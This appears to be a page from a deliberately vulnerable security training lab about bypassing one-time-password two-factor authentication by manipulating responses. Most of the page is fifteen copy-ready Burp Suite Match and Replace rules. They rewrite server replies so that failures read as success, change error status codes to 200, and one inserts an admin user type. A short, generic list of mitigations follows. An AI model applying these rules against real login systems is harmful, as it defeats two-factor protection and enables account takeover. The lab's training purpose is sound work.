Lab 4: OTP Bypass via Response

OTP bypass via response manipulation vulnerabilities

Difficulty: Low

Lab Overview

This lab demonstrates OTP bypass vulnerabilities where attackers can use Burp Suite to modify OTP verification responses and bypass two-factor authentication.

Objective: Understand how OTP bypass attacks work and how to exploit them using Burp Suite.

OTP Verification
Verify OTP

Test OTP verification with response manipulation:

Check OTP Status

Check OTP verification status:

Reset OTP

Reset OTP for user:

OTP Bypass Tester
⚠️ OTP Bypass Warning

This lab demonstrates OTP bypass vulnerabilities:

  • OTP Verification - Bypass OTP verification
  • Status Manipulation - Manipulate OTP status
  • Message Manipulation - Change error messages
  • Code Manipulation - Change validation codes
Burp Suite Rules

Use these Burp Suite Match and Replace rules:

  • "valid":false"valid":true
  • "verified":false"verified":true
  • "status":"invalid""status":"success"
  • "code":"invalid""code":"valid"
OTP Bypass Rules
OTP Validation Bypass
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"valid\":false", "string_replace": "\"valid\":true" }
OTP Verification Bypass
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"verified\":false", "string_replace": "\"verified\":true" }
Status Code Bypass
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"status\":\"invalid\"", "string_replace": "\"status\":\"success\"" }
Validation Code Bypass
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"code\":\"invalid\"", "string_replace": "\"code\":\"valid\"" }
Error Message Bypass
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"message\":\"Please enter the valid OTP\"", "string_replace": "\"message\":\"valid OTP\"" }
Invalid Code Bypass
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"Invalid OTP.\"", "string_replace": "\"\"" }
Vulnerability Details
  • Type: OTP Bypass via Response
  • Severity: High
  • Method: Burp Suite Match and Replace
  • Issue: Client-side trust of OTP responses
Attack Vectors
  • OTP Validation Bypass: Change false to true
  • Status Code Bypass: Change invalid to success
  • Message Manipulation: Change error messages
  • Code Manipulation: Change validation codes
OTP Bypass Examples

Use these Burp Suite Match and Replace rules to exploit OTP bypass vulnerabilities:

1. OTP Validation Bypass:
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"valid\":false", "string_replace": "\"valid\":true" } // This rule bypasses OTP validation // Example: "valid":false becomes "valid":true
2. OTP Verification Bypass:
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"verified\":false", "string_replace": "\"verified\":true" } // This rule bypasses OTP verification // Example: "verified":false becomes "verified":true
3. Status Code Bypass:
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"status\":\"invalid\"", "string_replace": "\"status\":\"success\"" } // This rule bypasses status validation // Example: "status":"invalid" becomes "status":"success"
4. Validation Code Bypass:
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"code\":\"invalid\"", "string_replace": "\"code\":\"valid\"" } // This rule bypasses code validation // Example: "code":"invalid" becomes "code":"valid"
5. Error Message Bypass:
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"message\":\"Please enter the valid OTP\"", "string_replace": "\"message\":\"valid OTP\"" } // This rule changes error messages // Example: "Please enter the valid OTP" becomes "valid OTP"
6. Invalid Code Bypass:
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"Invalid OTP.\"", "string_replace": "\"\"" } // This rule removes error messages // Example: "Invalid OTP." becomes ""
7. Response Code Bypass:
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"response\":\"invalid code\"", "string_replace": "\"response\":\"success\"" } // This rule bypasses response validation // Example: "response":"invalid code" becomes "response":"success"
8. Error Code Bypass:
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"error\":\"Invalid code\"", "string_replace": "\"success\":\"valid code\"" } // This rule changes error to success // Example: "error":"Invalid code" becomes "success":"valid code"
9. Code Not Found Bypass:
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"CodeNotFound\"", "string_replace": "\"codeverified\"" } // This rule bypasses code not found errors // Example: "CodeNotFound" becomes "codeverified"
10. Incorrect Verification Bypass:
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"Incorrect Verification Code\"", "string_replace": "\"verified OTP code\"" } // This rule changes verification errors // Example: "Incorrect Verification Code" becomes "verified OTP code"
11. Status Code 401 Bypass:
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"status\":401", "string_replace": "\"status\":200" } // This rule bypasses 401 status codes // Example: "status":401 becomes "status":200
12. Status Code 400 Bypass:
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"status\":400", "string_replace": "\"status\":200" } // This rule bypasses 400 status codes // Example: "status":400 becomes "status":200
13. Status Code 404 Bypass:
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"code\":404", "string_replace": "\"code\":200" } // This rule bypasses 404 status codes // Example: "code":404 becomes "code":200
14. Invalid Status Bypass:
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": ":\"INVALID\"", "string_replace": ":\"VERIFIED\"" } // This rule bypasses invalid status // Example: "status":"INVALID" becomes "status":"VERIFIED"
15. Simple Status Bypass:
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": true, "rule_type": "response_body", "string_match": "{\"status\":\"0\"}", "string_replace": "{\"status\":\"1\",\"user_type\":\"admin\"}" } // This rule bypasses simple status // Example: {"status":"0"} becomes {"status":"1","user_type":"admin"}
Real-World Attack Scenarios
Mitigation Strategies
  • Implement server-side OTP validation and verification
  • Use response integrity checks and signatures
  • Implement proper authentication and authorization
  • Use secure coding practices
  • Regular security testing and vulnerability assessments
  • Monitor for unusual response patterns
  • Implement proper input validation
  • Use secure session management
  • Implement proper error handling
  • Educate users about security threats
  • Use multi-factor authentication
  • Implement proper logging and monitoring
  • Use OTP bypass detection tools
  • Implement proper audit trails